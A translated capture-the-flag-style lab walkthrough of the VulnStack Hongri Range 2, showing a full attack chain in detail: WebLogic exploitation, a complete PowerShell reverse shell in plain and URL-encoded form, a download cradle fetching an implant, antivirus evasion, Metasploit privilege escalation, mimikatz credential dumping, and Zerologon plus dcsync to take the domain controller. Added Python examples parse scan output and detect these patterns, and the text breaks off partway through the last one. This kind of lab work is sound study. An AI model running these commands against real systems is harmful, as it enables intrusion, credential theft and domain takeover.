VulnStack: Hongri (Red Sun) Range 2

Source: compiled by Haote | Date: 2024-09-27 10:07:06

Hongri Range 2

Environment setup

Only one change is needed on the VM network: set the host-only adapter to the 10.10.10.0 subnet, as configured below.

Set the NAT adapter to the 192.168.96.0 subnet, as below.

First, restore the v1.3 snapshot.

Then click "Discard"; after discarding, power the machine on, log in as another user with the credentials .\de1ay:1qaz@WSX, and change the expired password when prompted. The login then succeeds.

Once that is done, start the WebLogic service on the WEB server from

C:\Oracle\Middleware\user_projects\domains\base_domain\bin

running it as administrator.

With the environment ready, we log in to kali.

I. nmap scan

1) Host discovery

sudo nmap -sn -o hosts 192.168.111.0/24
MAC Address: 00:50:56:FA:CB:D3 (VMware)
Nmap scan report for 192.168.111.80
Host is up (0.00013s latency).
MAC Address: 00:0C:29:BE:34:8C (VMware)
Nmap scan report for 192.168.111.201

192.168.111.201 and 192.168.111.80 are the newly added IPs.

2) Port discovery

192.168.111.80

sudo nmap -sT --min-rate 10000 -p- 192.168.111.80 -o 80_ports    
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 16:09 CST
Nmap scan report for 192.168.111.80
Host is up (0.00040s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
3389/tcp  open  ms-wbt-server
7001/tcp  open  afs3-callback
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49175/tcp open  unknown
49261/tcp open  unknown
60966/tcp open  unknown
MAC Address: 00:0C:29:BE:34:8C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 20.04 seconds

192.168.111.201

sudo nmap -sT --min-rate 10000 -p- 192.168.111.201 -o 201_ports 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 16:04 CST
Nmap scan report for 192.168.111.201
Host is up (0.00045s latency).
Not shown: 65526 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49178/tcp open  unknown
MAC Address: 00:0C:29:84:B4:3E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds

The host 192.168.111.80 has ports 80 and 7001 open, which is clearly the most interesting target: the web attack surface is broad, and 7001 is WebLogic's default port. We run a detailed scan against 192.168.111.80.

3) Detailed service scan

First we collect the open ports so the scan is faster and more accurate.

Copy the open ports into a ports variable:

ports=$(cat 80_ports | grep open | awk -F/ '{print $1}' | paste -sd ,)

After typing $ports, press Tab and the shell expands it in place.

sudo nmap -sT -sV -sC -O -p$ports 192.168.111.80 -o details
# Nmap 7.93 scan initiated Tue Sep 24 16:18:25 2024 as: nmap -sT -sV -sC -O -p80,135,139,445,1433,3389,7001,49152,49153,49154,49175,49261,60966 -o details 192.168.111.80
Nmap scan report for 192.168.111.80
Host is up (0.00080s latency).

PORT      STATE SERVICE        VERSION
80/tcp    open  http           Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title.
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp  open  ms-sql-s       Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-24T07:53:06
|_Not valid after:  2054-09-24T07:53:06
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
| ms-sql-ntlm-info: 
|   192.168.111.80:1433: 
|     Target_Name: DE1AY
|     NetBIOS_Domain_Name: DE1AY
|     NetBIOS_Computer_Name: WEB
|     DNS_Domain_Name: de1ay.com
|     DNS_Computer_Name: WEB.de1ay.com
|     DNS_Tree_Name: de1ay.com
|_    Product_Version: 6.1.7601
| ms-sql-info: 
|   192.168.111.80:1433: 
|     Version: 
|       name: Microsoft SQL Server 2008 R2 SP2
|       number: 10.50.4000.00
|       Product: Microsoft SQL Server 2008 R2
|       Service pack level: SP2
|       Post-SP patches applied: false
|_    TCP port: 1433
3389/tcp  open  ms-wbt-server?
| ssl-cert: Subject: commonName=WEB.de1ay.com
| Not valid before: 2024-09-23T07:46:09
|_Not valid after:  2025-03-25T07:46:09
| rdp-ntlm-info: 
|   Target_Name: DE1AY
|   NetBIOS_Domain_Name: DE1AY
|   NetBIOS_Computer_Name: WEB
|   DNS_Domain_Name: de1ay.com
|   DNS_Computer_Name: WEB.de1ay.com
|   DNS_Tree_Name: de1ay.com
|   Product_Version: 6.1.7601
|_  System_Time: 2024-09-24T08:19:51+00:00
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
7001/tcp  open  http           Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
|_http-title: Error 404--Not Found
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49175/tcp open  msrpc          Microsoft Windows RPC
49261/tcp open  msrpc          Microsoft Windows RPC
60966/tcp open  ms-sql-s       Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ms-sql-ntlm-info: 
|   192.168.111.80:60966: 
|     Target_Name: DE1AY
|     NetBIOS_Domain_Name: DE1AY
|     NetBIOS_Computer_Name: WEB
|     DNS_Domain_Name: de1ay.com
|     DNS_Computer_Name: WEB.de1ay.com
|     DNS_Tree_Name: de1ay.com
|_    Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-24T07:53:06
|_Not valid after:  2054-09-24T07:53:06
| ms-sql-info: 
|   192.168.111.80:60966: 
|     Version: 
|       name: Microsoft SQL Server 2008 R2 SP2
|       number: 10.50.4000.00
|       Product: Microsoft SQL Server 2008 R2
|       Service pack level: SP2
|       Post-SP patches applied: false
|_    TCP port: 60966
|_ssl-date: 2024-09-24T08:20:30+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3389-TCP:V=7.93%I=7%D=9/24%Time=66F275DE%P=x86_64-pc-linux-gnu%r(Te
SF:rminalServerCookie,13,"\x03\0\0\x13\x0e\xd0\0\0\x124\0\x02\x01\x08\0\x0
SF:2\0\0\0");
MAC Address: 00:0C:29:BE:34:8C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 7
OS CPE: cpe:/o:microsoft:windows_7
OS details: Microsoft Windows 7
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: WEB
|   NetBIOS computer name: WEB\x00
|   Domain name: de1ay.com
|   Forest name: de1ay.com
|   FQDN: WEB.de1ay.com
|_  System time: 2024-09-24T16:19:55+08:00
|_clock-skew: mean: -53m19s, deviation: 2h39m58s, median: 0s
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-09-24T08:19:54
|_  start_date: 2024-09-24T07:53:08

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 24 16:20:30 2024 -- 1 IP address (1 host up) scanned in 124.83 seconds

Port 7001 is confirmed to be the WebLogic service.
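
Reading a scan like the one above by hand is error-prone, so here is an added example (not from the original write-up) that parses nmap's normal-format output, produces the same comma-separated open-port list as the `grep | awk | paste` pipeline used later in this post, and turns the NSE script lines into a hardening list a defender can act on. The embedded scan text is a trimmed excerpt of the scan above; the finding messages are this example's own wording.

```python
"""Parse nmap normal-format output into an open-port list and hardening findings.

Added example, not part of the original write-up. Works on the text nmap
writes with -oN (or prints to the terminal).
"""
import re

# Constructed excerpt, trimmed from the detailed scan of 192.168.111.80 above.
SAMPLE_NMAP = """\
Nmap scan report for 192.168.111.80
Host is up (0.00080s latency).

PORT      STATE SERVICE        VERSION
80/tcp    open  http           Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
445/tcp   open  microsoft-ds   Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp  open  ms-sql-s       Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ms-sql-ntlm-info:
|   192.168.111.80:1433:
|     DNS_Computer_Name: WEB.de1ay.com
|_    Product_Version: 6.1.7601
3389/tcp  open  ms-wbt-server?
7001/tcp  open  http           Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)
49152/tcp open  msrpc          Microsoft Windows RPC

Host script results:
| smb2-security-mode:
|   210:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""

# One port line: "<port>/<proto>  <state>  <service>  <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

# (substring nmap actually prints, finding text). Matching is by substring so
# the rules survive small formatting differences between nmap versions.
RULES = [
    ("Potentially risky methods: TRACE", "HTTP TRACE enabled: disable it to remove cross-site tracing exposure"),
    ("T3 enabled", "WebLogic T3 reachable: restrict T3 with a connection filter or firewall"),
    ("Message signing enabled but not required", "SMB2 signing not required: enforce signing via policy"),
    ("message_signing: disabled", "SMB1 signing disabled: enforce signing and disable SMB1"),
    ("ms-sql-ntlm-info", "MS-SQL leaks NTLM host/domain info: block the port from untrusted networks"),
    ("account_used: guest", "SMB guest/null session accepted: disable guest access"),
]


def parse_ports(text):
    """Return [(port, proto, state, service, version)] for every port line."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append((int(m.group(1)), m.group(2), m.group(3),
                          m.group(4), m.group(5).strip()))
    return ports


def open_port_list(text):
    """Comma-separated open ports, the same value the shell pipeline produces."""
    return ",".join(str(p) for p, _, state, _, _ in parse_ports(text) if state == "open")


def hardening_findings(text):
    """Return [(port or None, finding)]; None means a host-level script result."""
    findings = []
    current_port = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current_port = int(m.group(1))      # script lines that follow belong to this port
        elif line.startswith("Host script"):
            current_port = None                 # host-level section starts here
        for needle, msg in RULES:
            if needle in line:
                findings.append((current_port, msg))
    return findings


if __name__ == "__main__":
    print(open_port_list(SAMPLE_NMAP))
    for port, msg in hardening_findings(SAMPLE_NMAP):
        print(f"[{port if port is not None else 'host'}] {msg}")
```

To use it on a saved scan, read the `-oN` file into a string and pass it in place of `SAMPLE_NMAP`. Host-level results such as the SMB signing mode come back with port `None`, because nmap prints them under "Host script results" rather than under a port.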

II. Web penetration

Open the page on port 80.

It is a blank page, so we set 80 aside.

Open port 7001.

This one has content, so we visit WebLogic's default login page:

http://192.168.111.80:7001/console/login/LoginForm.jsp

The bottom-left corner reveals the WebLogic version: 10.3.6.0.

Enumerate it with weblogicScanner:

git clone https://github.com/0xn0ne/weblogicScanner.git
cd weblogicScanner
python ws.py -t 192.168.111.80:7001 
[20:35:09][INFO] [!][CVE-2019-2890][192.168.111.80:7001] Connection error.
[20:35:09][INFO] [!][CVE-2017-3248][192.168.111.80:7001] Connection error.
[20:35:09][INFO] [-][CVE-2017-3248][192.168.111.80:7001] Not vulnerability.
[20:35:09][INFO] [-][CVE-2019-2890][192.168.111.80:7001] Not vulnerability.
[20:35:10][INFO] [+][CVE-2019-2618][192.168.111.80:7001] Found module, Please verify manually!
[20:35:10][INFO] [+][CVE-2017-3506][192.168.111.80:7001] Exists vulnerability!
[20:35:11][INFO] [!][CVE-2018-2893][192.168.111.80:7001] Connection error.
[20:35:11][INFO] [!][CVE-2018-2628][192.168.111.80:7001] Connection error.
[20:35:11][INFO] [-][CVE-2018-2628][192.168.111.80:7001] Not vulnerability.
[20:35:11][INFO] [-][CVE-2018-2893][192.168.111.80:7001] Not vulnerability.
[20:35:12][INFO] [!][CVE-2020-14882][192.168.111.80:7001] Connection error.
[20:35:12][INFO] [-][CVE-2020-14882][192.168.111.80:7001] Not vulnerability.
[20:35:13][INFO] [-][CVE-2017-10271][192.168.111.80:7001] Not vulnerability.
[20:35:14][INFO] [+][CVE-2019-2888][192.168.111.80:7001] Found module, Please verify manually!
[20:35:15][INFO] [+][CVE-2019-2725][192.168.111.80:7001] Exists vulnerability!
[20:35:19][INFO] [-][CVE-2020-2883][192.168.111.80:7001] Not vulnerability.
[20:35:19][INFO] [-][CVE-2018-3191][192.168.111.80:7001] Not vulnerability.
[20:35:20][INFO] [-][CVE-2020-2555][192.168.111.80:7001] Not vulnerability.
[20:35:21][INFO] [!][CVE-2020-2551][192.168.111.80:7001] Connection error.
[20:35:21][INFO] [-][CVE-2020-2551][192.168.111.80:7001] Not found.
[20:35:23][INFO] [+][CVE-2014-4210][192.168.111.80:7001] Found module, Please verify manually!
[20:35:24][INFO] [+][CVE-2016-3510][192.168.111.80:7001] Exists vulnerability!
[20:35:24][INFO] [-][CVE-2016-0638][192.168.111.80:7001] Not vulnerability.
[20:35:24][INFO] [+][CVE-2020-14750][192.168.111.80:7001] Exists vulnerability!
[20:35:25][INFO] [+][CVE-2018-3245][192.168.111.80:7001] Exists vulnerability!
[20:35:27][INFO] [-][CVE-2019-2729][192.168.111.80:7001] Not vulnerability.
[20:35:30][INFO] [-][Weblogic Console][192.168.111.80:7001] Not found.
[20:35:30][INFO] [-][CVE-2018-2894][192.168.111.80:7001] Not found.
[20:35:30][INFO] [-][CVE-2020-14883][192.168.111.80:7001] Not vulnerability.
[20:35:32][INFO] [-][CVE-2018-3252][192.168.111.80:7001] Not found.
Run completed, 30 seconds total.

Filter the results:

cat result.txt| grep + | sed -e  's/\[//g' | sed 's/\]/ /g'|awk '{print $4" " $6" " $7}' 
CVE-2019-2618 Found module,
CVE-2017-3506 Exists vulnerability!
CVE-2019-2888 Found module,
CVE-2019-2725 Exists vulnerability!
CVE-2014-4210 Found module,
CVE-2016-3510 Exists vulnerability!
CVE-2020-14750 Exists vulnerability!
CVE-2018-3245 Exists vulnerability!

Eight findings are either possible or confirmed. There is no shortcut; we try them one by one.

python CVE-2019-2618.py url username password

CVE-2019-2618.py needs credentials, so a vulnerability with such a precondition goes to the back of the queue.

Trying CVE-2017-3506 succeeds.

GitHub address: https://github.com/Al1ex/CVE-2017-3506

Open the link.

We see the username web\de1ay.

III. Getting a foothold

Reverse shell:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.111.10', 4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

URL-encoded:

powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient('192.168.111.10'%2C%204444)%3B%24stream%20%3D%20%24client.GetStream()%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile((%24i%20%3D%20%24stream.Read(%24bytes%2C%200%2C%20%24bytes.Length))%20-ne%200)%7B%3B%24data%20%3D%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString(%24bytes%2C0%2C%20%24i)%3B%24sendback%20%3D%20(iex%20%24data%202%3E%261%20%7C%20Out-String%20)%3B%24sendback2%20%20%3D%20%24sendback%20%2B%20'PS%20'%20%2B%20(pwd).Path%20%2B%20'%3E%20'%3B%24sendbyte%20%3D%20(%5Btext.encoding%5D%3A%3AASCII).GetBytes(%24sendback2)%3B%24stream.Write(%24sendbyte%2C0%2C%24sendbyte.Length)%3B%24stream.Flush()%7D%3B%24client.Close()%22

The shell calls back to kali successfully.

Run:

tasklist /svc

We see 360 processes, so 360 antivirus is most likely installed.

IV. AV evasion

1) Getting a CS session

Generate an AV-evading CS implant.

The implant that checks in to CS needs evasion; we use the BypassAV plugin.

BypassAV: https://github.com/hack2fun/BypassAV

Because this is a range running in a virtual environment, parts of the 360 AV are not fully functional, so the basic evasion produced by the CS plugin gets through. This is for learning reference only.

git clone https://github.com/hack2fun/BypassAV.git

Import its bypass.cna file in CS.

Import succeeded.

Generate the evasion executable with BypassAV.

Select the CS listener.

Start Python's web server on kali:

python -m http.server

In the reverse shell we obtained, run:

 powershell iex(new-object system.net.webclient).downloadfile('http://192.168.111.10:8000/shell.exe','c:\programdata\shell.exe')

Brief explanation: iex (Invoke-Expression) executes the string as a command; WebClient sends the HTTP request and downloads shell.exe into the machine's ProgramData directory.
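
The two command lines above (the TCPClient reverse shell and the Invoke-Expression download cradle) are exactly the kind of process-creation events a defender can score. The following added example, which is not part of the original write-up, runs a small rule set over constructed records shaped loosely like a Sysmon Event ID 1 `CommandLine` and `ParentImage` pair. It percent-decodes before matching, so the URL-encoded variant sent through WebLogic is caught as well, and it raises the score when the parent is a web-server process such as java.exe, which a WebLogic command-execution bug would produce. The record layout, the weights, the threshold and the parent-process list are assumptions of this example.

```python
"""Score PowerShell command lines for reverse-shell and download-cradle patterns.

Added example, not part of the original write-up. Records are constructed
and shaped loosely like Sysmon Event ID 1 (host, parent image, command line).
"""
import re
from urllib.parse import unquote

# Constructed sample records; the first three echo the command lines used in the write-up.
SAMPLE_EVENTS = [
    {"host": "WEB", "parent": "java.exe",
     "cmd": "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('192.168.111.10', 4444);"
            "$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)\""},
    {"host": "WEB", "parent": "cmd.exe",
     "cmd": "powershell iex(new-object system.net.webclient).downloadfile("
            "'http://192.168.111.10:8000/shell.exe','c:\\programdata\\shell.exe')"},
    {"host": "WEB", "parent": "java.exe",
     "cmd": "powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20"
            "System.Net.Sockets.TCPClient('192.168.111.10'%2C%204444)%22"},
    {"host": "WEB", "parent": "explorer.exe",
     "cmd": "powershell -File C:\\scripts\\backup.ps1"},       # benign, should score 0
]

# (rule name, compiled regex or None, weight). Case-insensitive because PowerShell is.
RULES = [
    ("reverse_shell_tcpclient", re.compile(r"System\.Net\.Sockets\.TCPClient", re.I), 5),
    ("invoke_expression", re.compile(r"\biex\b|Invoke-Expression", re.I), 2),
    ("download_cradle", re.compile(r"Net\.WebClient\)?\.Download(File|String)", re.I), 4),
    ("no_profile_inline", re.compile(r"-nop\b.*-c\b", re.I), 1),
    ("drop_to_programdata", re.compile(r"\\programdata\\[^'\" ]+\.(exe|dll)", re.I), 3),
    ("web_server_parent", None, 4),   # scored from the parent field, not the command line
]
# Assumed list of processes that should never spawn PowerShell on a web server.
WEB_PARENTS = {"java.exe", "w3wp.exe", "beasvc.exe"}


def normalise(cmd):
    """Percent-decode twice (covers double encoding) and collapse whitespace."""
    decoded = unquote(unquote(cmd))
    return re.sub(r"\s+", " ", decoded)


def score_event(event):
    """Return (score, [matched rule names]) for one process-creation record."""
    cmd = normalise(event["cmd"])
    hits, score = [], 0
    for name, rx, weight in RULES:
        if rx is None:
            matched = event.get("parent", "").lower() in WEB_PARENTS
        else:
            matched = rx.search(cmd) is not None
        if matched:
            hits.append(name)
            score += weight
    return score, hits


def alerts(events, threshold=5):
    """Records scoring at or above threshold, as (host, score, hits)."""
    out = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            out.append((ev["host"], score, hits))
    return out


if __name__ == "__main__":
    for host, score, hits in alerts(SAMPLE_EVENTS):
        print(host, score, ", ".join(hits))
```

Decoding before matching is the important design choice: the URL-encoded form never contains the literal string `TCPClient(`, so a rule set that matches raw command lines would miss the very payload shape this write-up sends. The threshold is chosen so that the TCPClient rule alone is enough to alert.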

The request succeeded, but our shell died. We kill the shell and trigger the reverse shell again.

We see the implant we uploaded.

Run:

.\shell.exe

The session checks in to CS successfully.

2) Getting an msf session

a) Direct handoff (failed)

Migrate the CS session to msf.

On msf:

use exploit/multi/handler
msf6 exploit(multi/handler) > set Lhost 192.168.111.10
Lhost => 192.168.111.10
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.111.10:4444 

On CS:

Add a foreign listener.

Right-click and choose spawn.

Select the foreign listener just created.

It fails; 360 has most likely blocked it.

b) msf obfuscation (succeeded)

Check the encoders:

msfvenom -l encoder | grep x64
    x64/xor                       normal     XOR Encoder
    x64/xor_context               normal     Hostname-based Context Keyed Payload Encoder
    x64/xor_dynamic               normal     Dynamic key XOR Encoder
    x64/zutto_dekiru              manual     Zutto Dekiru

Generate an msf payload, apply evasion and get it to check in:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.10 LPORT=4444 -e x64/xor_dynamic -f exe -o payload.exe

We use msfvenom's options for simple obfuscation. This is a range, only an abstraction of a real environment; nobody expects you to spend a long time building real evasion here.

Upload it.

The reverse shell's port conflicted with the msf payload's listening port, so the nc listening port was changed.

Run it.

We obtain a meterpreter session.

V. Privilege escalation

1) Privilege escalation in CS

In CS this is straightforward: the privilege escalation module of the TaoWu (梼杌) plugin does the job.

Click through them one at a time; MS-14-058 succeeds.

2) Privilege escalation in msf

msf is more tedious.

List the local exploit modules in msf:

search platform:windows type:exploit local

There are many privilege escalation exploits, which tests our experience in choosing among them.

Common privilege escalation vulnerabilities are listed below. Whether they succeed or not, they are all worth trying, and I mark the outcome of each.

a) getsystem (failed)

With a meterpreter session, the first thing to try is getsystem.

Privilege escalation failed.

b) ms16_032 (failed)

secondary_logon_handle_privesc: exploits a flaw in the Windows Secondary Logon service.

msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > use windows/local/ms16_032_secondary_logon_handle_privesc
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 6
session => 6
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 192.168.111.10:4444 
[+] Compressed size: 1160
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable
[+] Deleted 
[*] Exploit completed, but no session was created.

c) ms14_058 (succeeded)

ms14_058_track_popup_menu: exploits CVE-2014-6324 in Windows, which allows an attacker to elevate from a lowest-privileged user session to administrator level.

The session was re-established here, so the session id changed.

use windows/local/ms14_058_track_popup_menu
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set target 1    
target => 1 
msf6 exploit(windows/local/ms14_058_track_popup_menu) >set session 2
session => 2
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 192.168.111.10:4444 
[*] Reflectively injecting the exploit DLL and triggering the exploit...
[*] Launching msiexec to host the DLL...
[+] Process 4672 launched.
[*] Reflectively injecting the DLL into 4672...
[*] Sending stage (201798 bytes) to 192.168.111.80
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 3 opened (192.168.111.10:4444 -> 192.168.111.80:63084) at 2024-09-26 15:09:59 +0800

meterpreter > 

Privilege escalation succeeded.

d) bypassuac (failed)

There are many more methods; try them yourself if interested.

VI. Lateral movement

1) Domain controller discovery

Run mimikatz.

We see the credentials de1ay:hongrisec@2024 and mssql:1qaz@WSX.

Use portscan to discover hosts.

Two live hosts are found: 10.10.10.10 and 10.10.10.201.

The scan also reveals some of their open ports:

10.10.10.201:3389
[+] received output:
10.10.10.201:139
10.10.10.201:135
10.10.10.10:5985
[+] received output:
10.10.10.10:3389
[+] received output:
10.10.10.10:636
10.10.10.10:593
[+] received output:
10.10.10.10:464
[+] received output:
10.10.10.10:389
[+] received output:
10.10.10.10:139
10.10.10.10:135
[+] received output:
10.10.10.10:88
[+] received output:
10.10.10.10:53
[+] received output:
10.10.10.10:445
10.10.10.201:445

In the CS beacon, ping -a can be used to look up the hosts' names:

shell ping -a -n 1 10.10.10.10

shell ping -a -n 1 10.10.10.201

10.10.10.10 resolves to the name DC, so it is very likely the domain controller.

10.10.10.201 timed out, so we cannot confirm its identity yet.

2) Vulnerability check

Check whether the domain controller is vulnerable to Zerologon.

A brief introduction to Zerologon:
CVE-2020-1427 refers to a flaw in the cryptographic part of the authentication protocol used when connecting to the domain controller over the Netlogon secure channel. An attacker can set the domain controller administrator's password to empty, then retrieve password hashes and ultimately take full control of the domain controller.

The Netlogon component is an important Windows component used to authenticate users and machines on a domain network, replicate the database for domain controller backup, and maintain the relationships between domain members and the domain, between domains and domain controllers, and between DCs across domains.

Run in the CS beacon:

mimikatz lsadump::zerologon /target:DC.de1ay.com /account:DC$
beacon> mimikatz lsadump::zerologon /target:DC.de1ay.com /account:DC$
[*] Tasked beacon to run mimikatz's lsadump::zerologon /target:DC.de1ay.com /account:DC$ command
[+] host called home, sent: 750708 bytes
[+] received output:
Remote   : DC.de1ay.com
ProtSeq  : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no

Target : DC.de1ay.com
Account: DC$
Type   : 6 (Server)
Mode   : detect

Trying to 'authenticate'...
================================================================

  NetrServerAuthenticate2: 0x00000000

* Authentication: OK -- vulnerable

The Zerologon vulnerability is present.

3) Exploitation

mimikatz lsadump::zerologon /target:DC.de1ay.com /account:DC$ /exploit
[*] Tasked beacon to run mimikatz's lsadump::zerologon /target:DC.de1ay.com /account:DC$ /exploit command
[+] host called home, sent: 750708 bytes
[+] received output:
Remote   : DC.de1ay.com
ProtSeq  : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no

Target : DC.de1ay.com
Account: DC$
Type   : 6 (Server)
Mode   : exploit

Trying to 'authenticate'...
==============================================================================================

  NetrServerAuthenticate2: 0x00000000
  NetrServerPasswordSet2 : 0x00000000

* Authentication: OK -- vulnerable
* Set password  : OK -- may be unstable

Set password : OK.

Launch a dcsync attack to obtain the domain user's hash:

mimikatz lsadump::dcsync /domain:de1ay.com /dc:DC.de1ay.com /user:administrator /authuser:DC$ /authdomain:de1ay /authpassword:"" /authntlm
[+] host called home, sent: 750705 bytes
[+] received output:
[DC] 'de1ay.com' will be the domain
[DC] 'DC.de1ay.com' will be the DC server
[DC] 'administrator' will be the user account
[AUTH] Username: DC$
[AUTH] Domain  : de1ay
[AUTH] Password: 
[AUTH] Explicit NTLM Mode

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   : 1601/1/1 8:00:00
Password last change : 2019/9/9 10:40:33
Object Security ID   : S-1-5-21-2756371121-2868759905-3853650604-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 161cff084477fe596a5db81874498a24

Hash NTLM: 161cff084477fe596a5db81874498a24 is the administrator's hash.
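
The Zerologon check and exploitation above, and the dcsync that follows, each leave a distinctive trace on the domain controller: the DC's own computer account password is reset by a caller that is not that computer (Security event 4742), and the replication extended rights are then exercised by an account logged on from a host that is not a domain controller (event 4662, joined to the 4624 logon that records the source address). The following added example, which is not from the original write-up, implements both detections over constructed, simplified event records; the field names follow the Windows event schema loosely, and the IP addresses, logon ids and the DC allow-lists are invented for this lab.

```python
"""Flag Zerologon-style computer-account resets and DCSync replication requests.

Added example, not part of the original write-up. Event records are
constructed and simplified; real events carry many more fields.
"""

# Extended rights that directory replication (and therefore DCSync) requires.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}

# Constructed allow-lists for the lab: addresses and machine accounts of real DCs.
DC_ADDRESSES = {"10.10.10.10", "10.10.10.11"}
DC_ACCOUNTS = {"DC$", "DC2$"}

# Constructed sample events (logon ids, the second DC and the benign entries are invented).
SAMPLE_EVENTS = [
    # Zerologon: DC$ password reset by an unauthenticated caller. PasswordLastSet is
    # simplified to "changed"; the real field carries a timestamp when it changes.
    {"EventID": 4742, "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "DC$",
     "PasswordLastSet": "changed"},
    # Normal rotation: the computer changes its own machine-account password.
    {"EventID": 4742, "SubjectUserName": "WEB$", "TargetUserName": "WEB$",
     "PasswordLastSet": "changed"},
    # DC$ logging on from the compromised web server, then pulling replication data.
    {"EventID": 4624, "TargetUserName": "DC$", "TargetLogonId": "0x3e5a1",
     "IpAddress": "10.10.10.80"},
    {"EventID": 4662, "SubjectUserName": "DC$", "SubjectLogonId": "0x3e5a1",
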